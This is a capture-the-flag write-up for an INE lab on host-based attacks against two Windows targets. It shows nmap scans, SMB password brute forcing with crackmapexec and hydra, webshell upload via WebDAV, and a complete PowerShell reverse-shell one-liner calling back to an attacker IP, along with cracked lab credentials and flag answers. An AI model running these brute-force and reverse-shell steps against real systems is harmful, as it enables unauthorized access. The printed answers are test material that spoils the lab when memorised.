System-Host Based Attacks CTF 1
Overview¶
System/host-based attacks target the underlying operating system or individual hosts within a network to compromise their security. These attacks exploit vulnerabilities in the system's configuration, software, or hardware to gain unauthorized access, escalate privileges, or disrupt the normal functioning of the host. Common techniques include exploiting unpatched software vulnerabilities, misconfigurations, weak passwords, and malware infections. Attackers may attempt to gain root or administrator privileges to manipulate or steal sensitive data, install backdoors, or cause system crashes. System/host-based attacks can lead to significant breaches if not detected and mitigated promptly, making it essential for organizations to regularly update software, implement strong security policies, and monitor for suspicious activity to protect their systems from these threats.
This lab is designed to test your knowledge and skills in performing system/host-based attacks on Windows targets and identifying hidden information on a target machine.
In this lab environment, you will be provided with GUI access to a Kali Linux machine. Two machines are accessible at http://target1.ine.local and http://target2.ine.local.
Objective: Perform system/host-based attacks on the target and capture all the flags hidden within the environment.
Useful files:
/usr/share/metasploit-framework/data/wordlists/common_users.txt,
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt,
/usr/share/webshells/asp/webshell.asp
Flags to Capture:
Flag 1: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located. (target1.ine.local)
Flag 2: Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)
Flag 3: By attempting to guess SMB user credentials, you may uncover important information that could lead you to the next flag. (target2.ine.local)
Flag 4: The Desktop directory might have what you're looking for. Enumerate its contents. (target2.ine.local)
Writeup¶
Flag 1¶
Let's start by running an nmap scan on target1.ine.local.
┌──(root㉿INE)-[~]
└─# nmap -p- --min-rate=10000 target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 21:30 IST
SYN Stealth Scan Timing: About 99.99% done; ETC: 21:30 (0:00:00 remaining)
Nmap scan report for target1.ine.local (10.4.18.127)
Host is up (0.0094s latency).
Not shown: 64209 closed tcp ports (reset), 1311 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
49674/tcp open unknown
49679/tcp open unknown
┌──(root㉿INE)-[~/Desktop]
└─# nmap -sC -sV -p`cat nmap.txt` target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 21:35 IST
Nmap scan report for target1.ine.local (10.4.18.127)
Host is up (0.0094s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=target1.ine.local
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-04-06T16:06:06+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-JVD17HK
| Not valid before: 2024-12-31T07:25:48
|_Not valid after: 2025-07-02T07:25:48
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-JVD17HK
| NetBIOS_Domain_Name: EC2AMAZ-JVD17HK
| NetBIOS_Computer_Name: EC2AMAZ-JVD17HK
| DNS_Domain_Name: EC2AMAZ-JVD17HK
| DNS_Computer_Name: EC2AMAZ-JVD17HK
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-06T16:05:59+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-04-06T16:06:01
|_ start_date: N/A
smb for user bob using the provided wordlists. ┌──(root㉿INE)-[~/Desktop]
└─# crackmapexec smb target1.ine.local -u bob -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [*] Windows 10 / Server 2019 Build 17763 x64 (name:EC2AMAZ-JVD17HK) (domain:EC2AMAZ-JVD17HK) (signing:False) (SMBv1:False)
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [-] EC2AMAZ-JVD17HK\bob:admin STATUS_LOGON_FAILURE
...
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [-] EC2AMAZ-JVD17HK\bob:MargaretThatcheris110%SEXY STATUS_LOGON_FAILURE
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [-] EC2AMAZ-JVD17HK\bob:karaf STATUS_LOGON_FAILURE
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [-] EC2AMAZ-JVD17HK\bob:vagrant STATUS_LOGON_FAILURE
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [+] EC2AMAZ-JVD17HK\bob:password_123321
┌──(root㉿INE)-[~/Desktop]
└─# smbmap -r -u bob -p password_123321 -H target1.ine.local
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.2 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authentidated session(s)
[+] IP: 10.4.18.127:445 Name: target1.ine.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
./IPC$
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 InitShutdown
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 lsass
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 scerpc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-340-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 epmapper
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-1bc-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 eventlog
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-440-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 atsvc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-574-0
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 wkssvc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 TermSrv_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 Ctx_WinStation_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 SessEnvPublicRpc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-80c-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 spoolss
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-8b8-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 trkwks
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 W32TIME_ALT
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 srvsvc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-850-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-240-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-254-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 iisipmcccbe316-f262-429f-b505-8a01d0cfa06c
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 iislogpipeabb3be6c-e326-4d3d-8350-345ed666e264
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 E0K3f4WKN427r17Sd66Kr9sR2h8jvYM1POJzkXBZrdxR8QbP2CcokovPMPwF6ULwaG5jMqWeGtEsGHuKKDtqX67ES3D74jFdjDCnRJ3SCXygl6GNn6vDrC
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 CPFATP_2760_v4.0.30319
It seems there is nothing interesting. Let's try logging in via RDP, but it doesn't work. Check the websites. It asks for a username and password. Try the credentials found: bob:password_123321. Behind it is an IIS server, and in the webdav folder, we find the first flag.
Answer
fcc829e1edb744dd807634cd3ac4edb6
Flag 2¶
Let's exploit webdav to upload a reverse shell using metasploit.
After several attempts, I decide to upload a web shell. 
Using a PowerShell reverse shell payload, I gain a reverse shell.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.42.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
[*] Started reverse TCP handler on 10.10.42.2:4444
[*] Command shell session 1 opened (10.10.42.2:4444 -> 10.4.24.223:49810) at 2025-04-06 23:04:25 +0530
PS C:\windows\system32\inetsrv>
I find flag2 in C:/.
PS C:\windows\system32\inetsrv> cd /
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/14/2018 6:56 AM EFI
d----- 12/31/2024 7:18 AM inetpub
d----- 4/6/2025 5:34 PM Microsoft
d----- 5/13/2020 5:58 PM PerfLogs
d-r--- 1/1/2025 7:31 AM Program Files
d----- 11/7/2020 7:47 AM Program Files (x86)
d-r--- 1/1/2025 7:30 AM Users
d----- 11/7/2020 7:49 AM Utilities
d----- 4/6/2025 5:14 PM Windows
-a---- 4/6/2025 5:10 PM 34 flag2.txt
PS C:\> type flag2.txt
Answer
ea5697e8128445ea98a28b34e4f03f7a
Flag 3¶
Run nmap again on target 2.
┌──(root㉿INE)-[~]
└─# nmap --min-rate=10000 -p- target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 23:08 IST
Warning: 10.4.18.57 giving up on port because retransmission cap hit (10).
Nmap scan report for target2.ine.local (10.4.18.57)
Host is up (0.012s latency).
Not shown: 62059 closed tcp ports (reset), 3462 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49679/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds
Run a full nmap scan with scripts and version detection.
┌──(root㉿INE)-[~/Desktop]
└─# nmap -sC -sV -p`cat nmap.txt` target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 23:11 IST
Nmap scan report for target2.ine.local (10.4.18.57)
Host is up (0.0094s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Datacenter 17763 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-04-06T17:42:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-3SC2DRK
| Not valid before: 2024-12-31T08:26:27
|_Not valid after: 2025-07-02T08:26:27
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-3SC2DRK
| NetBIOS_Domain_Name: EC2AMAZ-3SC2DRK
| NetBIOS_Computer_Name: EC2AMAZ-3SC2DRK
| DNS_Domain_Name: EC2AMAZ-3SC2DRK
| DNS_Computer_Name: EC2AMAZ-3SC2DRK
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-06T17:41:54+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-06T17:41:55
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 2s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2019 Datacenter 17763 (Windows Server 2019 Datacenter 6.3)
| Computer name: EC2AMAZ-3SC2DRK
| NetBIOS computer name: EC2AMAZ-3SC2DRK\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-06T17:41:59+00:00
Attempt brute-forcing credentials with hydra.
┌──(root㉿INE)-[~/Desktop]
└─# hydra -L /root/Desktop/wordlists/copy-paste-files/common_users.txt -P wordlists/copy-paste-files/common_passwords.txt smb://target2.ine.local
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-06 23:16:59
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 350 login tries (l:7/p:50), ~350 tries per task
[DATA] attacking smb://target2.ine.local:445/
[445][smb] host: target2.ine.local login: demo password: password1
[445][smb] host: target2.ine.local login: administrator password: pineapple
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-06 23:17:09
demo:password1 and administrator:pineapple. Log in to smb with these credentials. Using smbmap, I see the entire directory tree: ┌──(root㉿INE)-[~/Desktop]
└─# smbmap -u administrator -p pineapple -H target2.ine.local -r
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.2 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authentidated session(s)
[/] Enumerating and traversing shares... [-] Enumerating and traversing shares... [\] Enumerating and traversing shares... [|] Enumerating and traversing shares... [/] Enumerating and traversing shares... [-] Enumerating and traversing shares... [\] Enumerating and traversing shares... [|] Enumerating and traversing shares... [/] Enumerating and traversing shares... [-] Enumerating and traversing shares... [\] Enumerating and traversing shares... [|] Enumerating and traversing shares... [/] Enumerating and traversing shares... [-] Enumerating and traversing shares... [\] Enumerating and traversing shares... [|] Enumerating and traversing shares...
[+] IP: 10.4.18.57:445 Name: target2.ine.local Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
./ADMIN$
dr--r--r-- 0 Sun Apr 6 23:19:58 2025 .
dr--r--r-- 0 Sun Apr 6 23:19:58 2025 ..
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ADFS
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 appcompat
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 apppatch
dr--r--r-- 0 Sat Nov 7 12:58:26 2020 AppReadiness
dw--w--w-- 0 Sat Nov 7 13:02:44 2020 assembly
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 bcastdvr
fr--r--r-- 78848 Wed Sep 9 11:14:09 2020 bfsvc.exe
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Boot
fr--r--r-- 67584 Sun Apr 6 22:41:30 2025 bootstat.dat
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Branding
dr--r--r-- 0 Tue Dec 31 17:03:51 2024 CbsTemp
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Containers
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Cursors
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 debug
fr--r--r-- 232960 Wed Sep 9 11:14:09 2020 DfsrAdmin.exe
fr--r--r-- 1315 Wed Sep 9 11:14:09 2020 DfsrAdmin.exe.config
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 diagnostics
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 DigitalLocker
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Downloaded Program Files
fr--r--r-- 219754 Wed Sep 9 11:14:09 2020 DPINST.LOG
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 drivers
fr--r--r-- 56781 Wed Jan 1 13:54:07 2025 DtcInstall.log
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ELAMBKUP
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 en-US
fr--r--r-- 4443888 Wed Sep 9 11:14:09 2020 explorer.exe
dw--w--w-- 0 Sat Nov 7 12:54:45 2020 Fonts
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Globalization
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Help
fr--r--r-- 1071616 Wed Sep 9 11:14:09 2020 HelpPane.exe
fr--r--r-- 18432 Wed Sep 9 11:14:09 2020 hh.exe
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 IdentityCRL
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 IME
dw--w--w-- 0 Wed Sep 9 11:16:15 2020 ImmersiveControlPanel
dr--r--r-- 0 Sun Apr 6 22:39:35 2025 INF
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 InputMethod
dr--r--r-- 0 Wed Jan 1 13:47:30 2025 Installer
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 L2Schemas
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 LiveKernelReports
dr--r--r-- 0 Tue Dec 31 17:29:57 2024 Logs
fr--r--r-- 1380 Wed Sep 9 11:14:09 2020 lsasetup.log
dw--w--w-- 0 Wed Sep 9 11:16:15 2020 media
fr--r--r-- 43131 Wed Sep 9 11:14:09 2020 mib.bin
dw--w--w-- 0 Sun Apr 6 22:49:43 2025 Microsoft.NET
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Migration
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ModemLogs
fr--r--r-- 254464 Wed Sep 9 11:14:09 2020 notepad.exe
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 OCR
dw--w--w-- 0 Wed Sep 9 11:16:15 2020 Offline Web Pages
dr--r--r-- 0 Wed Jan 1 13:56:28 2025 Panther
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Performance
fr--r--r-- 1399844 Wed Jan 1 13:53:29 2025 PFRO.log
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 PLA
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 PolicyDefinitions
dr--r--r-- 0 Sun Apr 6 22:39:32 2025 Prefetch
dw--w--w-- 0 Wed Sep 9 11:16:15 2020 PrintDialog
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Provisioning
fr--r--r-- 358400 Wed Sep 9 11:14:09 2020 regedit.exe
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Registration
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 RemotePackages
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 rescache
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Resources
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 SchCache
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 schemas
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 security
fr--r--r-- 30914 Wed Sep 9 11:14:09 2020 ServerDataCenter.xml
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ServiceProfiles
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ServiceState
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 servicing
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Setup
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 ShellComponents
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 ShellExperiences
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 SKB
dr--r--r-- 0 Sun Apr 6 22:44:31 2025 SoftwareDistribution
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Speech
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Speech_OneCore
fr--r--r-- 165376 Wed Sep 9 11:14:09 2020 splwow64.exe
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 System
fr--r--r-- 219 Wed Sep 9 11:14:09 2020 system.ini
dr--r--r-- 0 Sun Apr 6 22:43:40 2025 System32
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 SystemApps
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 SystemResources
dr--r--r-- 0 Sat Nov 7 12:54:48 2020 SysWOW64
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 TAPI
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Tasks
dr--r--r-- 0 Sun Apr 6 22:49:43 2025 Temp
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 TextInput
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 tracing
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 twain_32
fr--r--r-- 64512 Wed Sep 9 11:14:09 2020 twain_32.dll
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Vss
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 WaaS
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Web
fr--r--r-- 92 Wed Sep 9 11:14:09 2020 win.ini
fw--w--w-- 670 Wed Sep 9 11:14:09 2020 WindowsShell.Manifest
fr--r--r-- 276 Sat Nov 7 13:45:54 2020 WindowsUpdate.log
fr--r--r-- 11776 Wed Sep 9 11:14:09 2020 winhlp32.exe
dr--r--r-- 0 Tue Dec 31 17:18:50 2024 WinSxS
fr--r--r-- 316640 Wed Sep 9 11:14:09 2020 WMSysPr9.prx
fr--r--r-- 11264 Wed Sep 9 11:14:09 2020 write.exe
C$ READ, WRITE Default share
./C$
dr--r--r-- 0 Sat Nov 7 13:45:59 2020 $Recycle.Bin
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Boot
fw--w--w-- 408692 Wed Sep 9 11:14:01 2020 bootmgr
fr--r--r-- 1 Wed Sep 9 11:14:01 2020 BOOTNXT
dr--r--r-- 0 Wed Sep 9 11:14:01 2020 Documents and Settings
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 EFI
fr--r--r-- 34 Sun Apr 6 22:40:20 2025 flag3.txt
fr--r--r-- 2013265920 Sun Apr 6 22:39:28 2025 pagefile.sys
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 PerfLogs
dw--w--w-- 0 Sat Nov 7 13:17:23 2020 Program Files
dr--r--r-- 0 Sat Nov 7 13:17:24 2020 Program Files (x86)
dr--r--r-- 0 Wed Jan 1 13:47:15 2025 ProgramData
dr--r--r-- 0 Wed Jan 1 13:54:07 2025 Recovery
dr--r--r-- 0 Tue Dec 31 16:59:14 2024 Shared
dr--r--r-- 0 Sat Nov 7 12:06:43 2020 System Volume Information
dw--w--w-- 0 Wed Jan 1 14:00:24 2025 Users
dr--r--r-- 0 Sat Nov 7 13:19:14 2020 Utilities
dr--r--r-- 0 Sun Apr 6 23:19:58 2025 Windows
IPC$ READ ONLY Remote IPC
./IPC$
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 InitShutdown
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 lsass
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 scerpc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-330-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 epmapper
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-1b4-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 eventlog
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-434-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 atsvc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-544-0
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 wkssvc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 TermSrv_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 Ctx_WinStation_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 SessEnvPublicRpc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 spoolss
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-894-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-8ec-0
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 srvsvc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 trkwks
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-238-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-828-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 browser
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-248-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
Shared NO ACCESS
Shared2 NO ACCESS
Shared3 NO ACCESS
flag3.txt. I log in with smbclient and download it. ┌──(root㉿INE)-[~/Desktop]
└─# smbclient //target2.ine.local/C$ -U administrator
Password for [WORKGROUP\administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Sat Nov 7 13:45:59 2020
Boot DHS 0 Wed Sep 9 10:08:52 2020
bootmgr AHSR 408692 Wed Sep 9 10:03:42 2020
BOOTNXT AHS 1 Sat Sep 15 12:42:30 2018
Documents and Settings DHSrn 0 Wed Nov 14 21:40:15 2018
EFI D 0 Wed Nov 14 12:26:18 2018
flag3.txt A 34 Sun Apr 6 22:40:20 2025
pagefile.sys AHS 2013265920 Sun Apr 6 22:39:28 2025
PerfLogs D 0 Wed May 13 23:28:09 2020
Program Files DR 0 Sat Nov 7 13:17:23 2020
Program Files (x86) D 0 Sat Nov 7 13:17:24 2020
ProgramData DHn 0 Wed Jan 1 13:47:15 2025
Recovery DHSn 0 Wed Jan 1 13:54:07 2025
Shared D 0 Tue Dec 31 16:59:14 2024
System Volume Information DHS 0 Sat Nov 7 12:06:43 2020
Users DR 0 Wed Jan 1 14:00:24 2025
Utilities D 0 Sat Nov 7 13:19:05 2020
Windows D 0 Sun Apr 6 23:19:58 2025
7863807 blocks of size 4096. 3647478 blocks available
smb: \> get flag3.txt
Answer
1628aa2439564519a66ed1c570b67440
Flag 4¶
Enter the administrator's home directory.
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Apr 6 22:40:20 2025
.. DR 0 Sun Apr 6 22:40:20 2025
desktop.ini AHS 282 Wed Jan 1 14:00:35 2025
flag4.txt A 34 Sun Apr 6 22:40:20 2025
7863807 blocks of size 4096. 3647460 blocks available
smb: \Users\Administrator\Desktop\> get flag4.txt
getting file \Users\Administrator\Desktop\flag4.txt of size 34 as flag4.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
Answer
